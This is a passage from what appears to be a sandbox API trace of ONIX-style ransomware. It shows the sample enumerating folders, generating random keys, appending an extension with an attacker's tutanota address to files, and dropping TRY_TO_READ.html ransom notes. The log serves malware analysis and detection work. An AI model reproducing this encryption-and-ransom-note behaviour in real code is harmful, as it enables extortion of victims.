HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47f540 | out: hHeap=0x410000) returned 1 [0065.494] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.494] FindNextFileW (in: hFindFile=0x48e730, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0065.494] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.494] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.494] GetLastError () returned 0x0 [0065.494] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47f540 [0065.494] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.494] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.494] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.494] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.494] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47f540 | out: hHeap=0x410000) returned 1 [0065.494] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.494] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100) returned 0x48d9e0 [0065.494] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466778 [0065.494] CreateFileW (lpFileName="C:\\\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.494] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.494] CreateFileW (lpFileName="C:\\\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.494] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.495] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48d9e0 | out: pbBuffer=0x48d9e0) returned 1 [0065.495] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x466778 | out: pbBuffer=0x466778) returned 1 [0065.495] SetFileAttributesW (lpFileName="C:\\\\Boot\\zh-TW\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0065.495] lstrlenW (lpString="C:\\\\Boot\\zh-TW\\bootmgr.exe.mui") returned 30 [0065.495] GetProcessHeap () returned 0x410000 [0065.495] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xac) returned 0x473108 [0065.495] lstrcpyW (in: lpString1=0x473108, lpString2="C:\\\\Boot\\zh-TW\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\zh-TW\\bootmgr.exe.mui") returned="C:\\\\Boot\\zh-TW\\bootmgr.exe.mui" [0065.495] lstrcatW (in: lpString1="C:\\\\Boot\\zh-TW\\bootmgr.exe.mui", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Boot\\zh-TW\\bootmgr.exe.mui.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Boot\\zh-TW\\bootmgr.exe.mui.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0065.495] GetProcessHeap () returned 0x410000 [0065.495] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473108 | out: hHeap=0x410000) returned 1 [0065.495] CloseHandle (hObject=0xffffffff) returned 0 [0065.495] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.495] FindNextFileW (in: hFindFile=0x48e730, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x309bac30, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x309bac30, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x309bac30, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0065.495] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.495] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.495] GetLastError () returned 0x6 [0065.495] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.495] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c60 [0065.495] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.495] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.495] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c60 | out: hHeap=0x410000) returned 1 [0065.495] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.495] FindNextFileW (in: hFindFile=0x48e730, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x309bac30, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x309bac30, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x309bac30, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0065.495] CloseHandle (hObject=0x3cc) returned 1 [0065.495] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.496] GetSystemTime (in: lpSystemTime=0x530400 | out: lpSystemTime=0x530400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x5, wMilliseconds=0x8f)) [0065.496] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x540000 [0065.496] GetWindowsDirectoryW (in: lpBuffer=0x540000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0065.496] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x540200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x540600, lpMaximumComponentLength=0x540608, lpFileSystemFlags=0x540604, lpFileSystemNameBuffer=0x540400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x540600*=0x9c354b42, lpMaximumComponentLength=0x540608*=0xff, lpFileSystemFlags=0x540604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0065.496] wsprintfW (in: param_1=0x530000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\MSOCache\\All Users9c354ca09c354b444c.lock") returned 45 [0065.496] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users9c354ca09c354b444c.lock" (normalized: "c:\\msocache\\all users9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0065.505] VirtualFree (lpAddress=0x540000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.505] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.505] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.505] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.505] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470b48 | out: hHeap=0x410000) returned 1 [0065.506] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4720c8 | out: hHeap=0x410000) returned 1 [0065.506] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x309e0d90, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x309e0d90, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48e770 [0065.506] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.506] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.506] GetLastError () returned 0x0 [0065.506] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470b48 [0065.506] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.506] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.506] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x472000 [0065.506] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x48e7b0 [0065.506] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48e7b0 | out: hHeap=0x410000) returned 1 [0065.506] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.506] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.506] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x472000 | out: hHeap=0x410000) returned 1 [0065.506] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470b48 | out: hHeap=0x410000) returned 1 [0065.506] FindNextFileW (in: hFindFile=0x48e770, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x309e0d90, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x309e0d90, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.507] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.507] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.507] GetLastError () returned 0x0 [0065.507] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470b48 [0065.507] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.507] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.507] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x472000 [0065.507] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x48e7b0 [0065.507] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48e7b0 | out: hHeap=0x410000) returned 1 [0065.507] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.507] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.507] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x472000 | out: hHeap=0x410000) returned 1 [0065.507] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470b48 | out: hHeap=0x410000) returned 1 [0065.507] FindNextFileW (in: hFindFile=0x48e770, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x309e0d90, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x309e0d90, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x309e0d90, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0065.507] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.507] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.507] GetLastError () returned 0x0 [0065.507] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x457f50 [0065.507] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.507] GetLastError () returned 0x0 [0065.507] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470b48 [0065.507] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.507] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.507] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.507] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.507] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470b48 | out: hHeap=0x410000) returned 1 [0065.508] FindNextFileW (in: hFindFile=0x48e770, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-0016-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~3")) returned 1 [0065.508] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0065.508] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.508] GetLastError () returned 0x0 [0065.508] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x457f50 [0065.508] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.508] GetLastError () returned 0x0 [0065.508] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x472550 [0065.508] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x461a20 [0065.508] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x472550 | out: hHeap=0x410000) returned 1 [0065.508] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x461a20 | out: hHeap=0x410000) returned 1 [0065.508] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458280 [0065.508] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x472000 [0065.508] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458308 [0065.508] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466788 [0065.508] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466798 [0065.508] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.508] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458390 [0065.508] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.508] GetLastError () returned 0x0 [0065.508] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc0) returned 0x43e3f8 [0065.508] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458390 | out: hHeap=0x410000) returned 1 [0065.508] GetLastError () returned 0x0 [0065.508] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xb0) returned 0x473108 [0065.508] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0065.511] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473108 | out: hHeap=0x410000) returned 1 [0065.511] WriteFile (in: hFile=0x45c, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0065.512] WriteFile (in: hFile=0x45c, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0065.512] WriteFile (in: hFile=0x45c, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0065.512] CloseHandle (hObject=0x45c) returned 1 [0065.512] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0065.512] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466798 | out: hHeap=0x410000) returned 1 [0065.512] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466788 | out: hHeap=0x410000) returned 1 [0065.512] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458308 | out: hHeap=0x410000) returned 1 [0065.512] FindNextFileW (in: hFindFile=0x48e770, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xecdfa490, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-0018-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~2")) returned 1 [0065.512] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0065.512] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.512] GetLastError () returned 0x0 [0065.512] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x457f50 [0065.512] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.512] GetLastError () returned 0x0 [0065.512] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x472550 [0065.512] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x461a20 [0065.513] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x472550 | out: hHeap=0x410000) returned 1 [0065.513] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x461a20 | out: hHeap=0x410000) returned 1 [0065.513] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458308 [0065.513] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x4720a0 [0065.513] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458390 [0065.513] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466788 [0065.513] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466798 [0065.513] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.513] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458418 [0065.513] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.513] GetLastError () returned 0x0 [0065.513] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc0) returned 0x43e3f8 [0065.513] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458418 | out: hHeap=0x410000) returned 1 [0065.513] GetLastError () returned 0x0 [0065.513] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xb0) returned 0x473108 [0065.513] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0065.516] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473108 | out: hHeap=0x410000) returned 1 [0065.516] WriteFile (in: hFile=0x45c, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0065.517] WriteFile (in: hFile=0x45c, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0065.517] WriteFile (in: hFile=0x45c, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0065.517] CloseHandle (hObject=0x45c) returned 1 [0065.518] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0065.518] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466798 | out: hHeap=0x410000) returned 1 [0065.518] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466788 | out: hHeap=0x410000) returned 1 [0065.518] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458390 | out: hHeap=0x410000) returned 1 [0065.518] FindNextFileW (in: hFindFile=0x48e770, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc3e6570, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc8a9170, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-0019-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9877A~1")) returned 1 [0065.518] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0065.518] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.518] GetLastError () returned 0x0 [0065.518] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x457f50 [0065.518] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.518] GetLastError () returned 0x0 [0065.518] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x472550 [0065.518] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x461a20 [0065.518] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x472550 | out: hHeap=0x410000) returned 1 [0065.518] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x461a20 | out: hHeap=0x410000) returned 1 [0065.518] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458390 [0065.518] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x472078 [0065.518] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458418 [0065.518] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466788 [0065.518] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466798 [0065.518] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.518] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4584a0 [0065.518] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.518] GetLastError () returned 0x0 [0065.518] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc0) returned 0x43e3f8 [0065.518] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4584a0 | out: hHeap=0x410000) returned 1 [0065.518] GetLastError () returned 0x0 [0065.518] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xb0) returned 0x473108 [0065.518] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0065.521] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473108 | out: hHeap=0x410000) returned 1 [0065.521] WriteFile (in: hFile=0x45c, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0065.522] WriteFile (in: hFile=0x45c, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0065.522] WriteFile (in: hFile=0x45c, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, 